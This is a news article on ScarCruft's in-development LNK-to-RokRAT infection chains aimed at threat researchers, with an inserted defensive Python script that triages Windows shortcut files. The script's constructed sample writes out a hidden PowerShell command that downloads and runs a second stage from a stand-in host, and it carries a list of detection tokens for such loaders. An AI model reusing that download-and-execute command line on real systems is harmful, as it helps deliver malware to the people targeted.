ScarCruft, the North Korea-sponsored advanced persistent threat (APT) group, is gearing up for targeted attacks on cybersecurity researchers and other members of the threat intelligence community — likely in a bid to steal nonpublic threat intel and improve its operational playbook.
According to an analysis from SentinelLabs, ScarCruft (aka APT37, Inky Squid, RedEyes, and Reaper) spent November and December targeting media organizations and think-tank personnel who focus on North Korean affairs, in a series of fairly typical impersonation-style attacks that researchers expect to continue into 2024. However, while analyzing that campaign, SentinelLabs researchers came across new, in-development malware and trial infection chains that suggest a different type of offensive is in the offing.
Cyberattackers Target the Threat Intelligence Community
This is not the first time North Korean actors have targeted cybersecurity professionals. What is notable is the lure: the infection routine the attackers have been testing uses genuine technical threat research on the North Korean APT known as Kimsuky as its decoy document.
That report is real, published in October by Genians, a South Korean cybersecurity company. Using a fellow DPRK group's public exposure as bait is a twist that appears to break new ground, according to Aleksandar Milenkoski, senior threat researcher at SentinelOne.
"To date, based on our visibility, we have not [previously] observed ScarCruft or any other suspected North Korean threat actor, using threat research materials related to another suspected threat actor in the region as decoys," he notes. "Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and command-and-control server configurations."
Based on the lure and other details spotted in the malware testing activities, "the adversary likely intends to target … cybersecurity professionals or businesses," Milenkoski explains. "We suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber-threat landscape, targeting audiences consuming threat intelligence reports."
As for the end goal, the firm concluded that one aim is likely to steal such reports, which would reveal whether researchers are onto ScarCruft's latest tactics, techniques, and procedures (TTPs), thus "identifying potential threats to [the APT's] operations and contributing to refining their operational and evasive approaches."
A twin goal could be gaining access to cybersecurity environments to use as a launchpad for convincing impersonation attacks — i.e., "mimicking cybersecurity professionals and businesses to target specific customers and contacts directly, or more broadly through brand impersonation," according to the SentinelOne report.
Cybersecurity Researchers Beware: ScarCruft Dangles Kimsuky Lure
ScarCruft has a long history of targeted attacks against South Korean individuals, as well as public and private entities, and acts as a cyber-espionage specialist for the Democratic People's Republic of Korea (DPRK).
"ScarCruft has been observed to share operational characteristics with Kimsuky, like infrastructure and command-and-control server configurations," Milenkoski says. "Current understanding of the group indicates they are primarily conducting intelligence collection, aligned with the efforts of the Ministry of State Security (MSS) and in support of North Korean strategic interests."
To that end, in the active campaign that was originally the focus of SentinelLabs' analysis, ScarCruft repeatedly targeted the same individuals with the goal of delivering RokRAT, a custom backdoor developed by the group that supports a range of surveillance functions on compromised hosts.
RokRAT is also at the center of the wave of attacks on cybersecurity professionals that SentinelLabs expects, according to its report.
"While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft's planning and testing processes," the researchers said. "This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk."
Both malicious LNK files execute PowerShell code when opened. That code drops the decoy Kimsuky PDF (named "inteligence.pdf") and fetches a hex-encoded file named story.txt from cloud storage. In the case of inteligence.lnk, the decoded story.txt merely launches notepad.exe, indicating that this file was built for testing purposes, the researchers explained.
On the other hand, "the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor," according to the analysis. "It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns."
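The chain described above (a shortcut that launches PowerShell, drops a decoy document and pulls a second stage from cloud storage) leaves static artifacts a defender can triage without executing anything: the shortcut is far larger than a real one, carries data appended after the link structure, and its arguments string names powershell.exe with download or obfuscation switches. The following Python is an added example, not code from the SentinelLabs report or from the malware. It parses the MS-SHLLINK layout far enough to recover the target and arguments and flags those traits. The sample shortcuts, their command line (including the host storage.example.invalid) and the 1 MiB size threshold are constructed for the example; the contents of the real inteligence.lnk and news.lnk are not reproduced here.

```python
"""Static triage of Windows Shell Link (.lnk) files.

Parses the MS-SHLLINK layout (header -> LinkTargetIDList -> LinkInfo ->
StringData -> ExtraData), recovers the target/arguments strings and flags
oversized files, trailing data and PowerShell-style command lines.
The shortcuts built by build_sample_lnk() are constructed fixtures."""
import struct

# {00021401-0000-0000-C000-000000000046}, the Shell Link CLSID, in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits that decide which structures follow the 76-byte header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData items appear in this fixed order when their flag is set
STRING_ITEMS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                (HAS_ICON_LOCATION, "icon_location"))

OVERSIZED_THRESHOLD = 1024 * 1024  # assumed cut-off; genuine shortcuts are a few KiB
SUSPICIOUS_TOKENS = ("powershell", "-enc", "-windowstyle hidden", "-w hidden", "-nop",
                     "-noprofile", "bypass", "downloadstring", "downloadfile",
                     "invoke-webrequest", "iex ", "frombase64string")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, the StringData fields and the byte count trailing the structure."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize covers the TerminalID
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize covers the whole block
    unicode = bool(flags & IS_UNICODE)
    strings = {}
    for flag, name in STRING_ITEMS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        strings[name] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    # ExtraData: BlockSize + BlockSignature + payload per block; BlockSize < 4 terminates
    while pos + 4 <= len(data):
        block_size = struct.unpack_from("<I", data, pos)[0]
        if block_size < 4:
            pos += 4
            break
        pos += block_size
    return {"flags": flags, "strings": strings, "overlay_bytes": max(0, len(data) - pos)}


def triage_lnk(data: bytes) -> dict:
    """Reconstruct the command line and list the reasons to treat the file as a loader."""
    info = parse_lnk(data)
    s = info["strings"]
    command_line = " ".join(x for x in (s.get("relative_path", ""), s.get("arguments", "")) if x)
    findings = []
    if len(data) >= OVERSIZED_THRESHOLD:
        findings.append(f"oversized shortcut: {len(data)} bytes")
    if info["overlay_bytes"]:
        findings.append(f"{info['overlay_bytes']} bytes appended after the link structure")
    hits = [t for t in SUSPICIOUS_TOKENS if t in command_line.lower()]
    if hits:
        findings.append("command line tokens: " + ", ".join(hits))
    return {"command_line": command_line, "overlay_bytes": info["overlay_bytes"],
            "findings": findings, "suspicious": bool(findings)}


def build_sample_lnk(target: str, arguments: str, overlay: bytes = b"") -> bytes:
    """Constructed fixture: minimal Shell Link with a one-item IDList, relative target,
    arguments, an ExtraData terminal block and optional appended bytes."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags).ljust(HEADER_SIZE, b"\x00")
    id_list = struct.pack("<H", 5) + b"\x1f\x50\x00" + b"\x00\x00"  # 5-byte ItemID + TerminalID
    id_list = struct.pack("<H", len(id_list)) + id_list

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + string_data(target) + string_data(arguments) + b"\0\0\0\0" + overlay


if __name__ == "__main__":
    ps = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    args = ('-WindowStyle Hidden -NoProfile -Command "IEX (New-Object Net.WebClient)'
            ".DownloadString('https://storage.example.invalid/story.txt')\"")  # constructed
    loader = build_sample_lnk(ps, args, overlay=b"\x00" * (2 * 1024 * 1024))
    plain = build_sample_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")
    for label, blob in (("loader", loader), ("plain", plain)):
        result = triage_lnk(blob)
        print(label, "SUSPICIOUS" if result["suspicious"] else "clean", result["findings"])
```

Run it against a directory of attachments by reading each file and calling `triage_lnk`; anything that reports appended data or an oversized file deserves a sandbox detonation rather than a double-click. The size threshold is the weakest signal of the three and is tuned for this example; the appended-data check is stronger because a shortcut Windows wrote itself ends at the ExtraData terminal block.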
While the approach is similar to campaigns in the wild that researchers have previously analyzed, it’s clear that the group is fine-tuning and tinkering with its approaches.
"ScarCruft's malware testing activities reveal the adversary's commitment to innovating its arsenal and expanding its target list," according to the SentinelLabs report on ScarCruft, released today. "We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community."
Milenkoski advises cybersecurity researchers, especially those who examine the Korean threat landscape, to stay alert and be on the lookout for cleverly designed, convincing email attacks going forward.
"Cybersecurity professionals are typically more aware of warning signs than the general public, so the barrier is higher," he says. “Nevertheless, the general advice of maintaining vigilance against social engineering attempts and avoiding the opening of unknown attachments or clicking on unknown links unless they are from a trusted source still applies."